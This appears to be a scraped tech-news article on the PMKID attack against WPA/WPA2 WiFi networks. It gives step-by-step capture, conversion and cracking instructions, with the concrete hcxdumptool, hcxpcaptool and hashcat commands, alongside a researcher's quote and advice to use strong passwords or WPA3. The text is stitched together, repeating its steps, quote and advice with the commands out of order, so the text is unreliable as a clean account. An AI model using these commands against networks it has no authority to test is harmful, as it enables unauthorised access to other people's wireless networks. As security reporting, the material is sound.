How to Hack WiFi Password Using PMKID
Step 1 — An attacker can use a tool, like hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.
Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!
That's the password of the target wireless network, cracking which may take time depending on its length and complexity.
"At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)," Steube said.
Since the new WiFi hack only works against networks with roaming functions enabled and requires attackers to brute force the password, users are recommended to protect their WiFi network with a secure password that's difficult to crack.
This WiFi hack also does not work against next-generation wireless security protocol WPA3, since the new protocol is "much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE)."
Also Check: Wi-Fi Hacking and Penetration Testing From Scratch Training Course.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
That's the password of the target wireless network, cracking which may take time depending on its length and complexity.
"At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)," Steube said.
Since the new WiFi hack only works against networks with roaming functions enabled and requires attackers to brute force the password, users are recommended to protect their WiFi network with a secure password that's difficult to crack.
This WiFi hack also does not work against next-generation wireless security protocol WPA3, since the new protocol is "much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE)."
Also Check: Wi-Fi Hacking and Penetration Testing From Scratch Training Course.
Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.
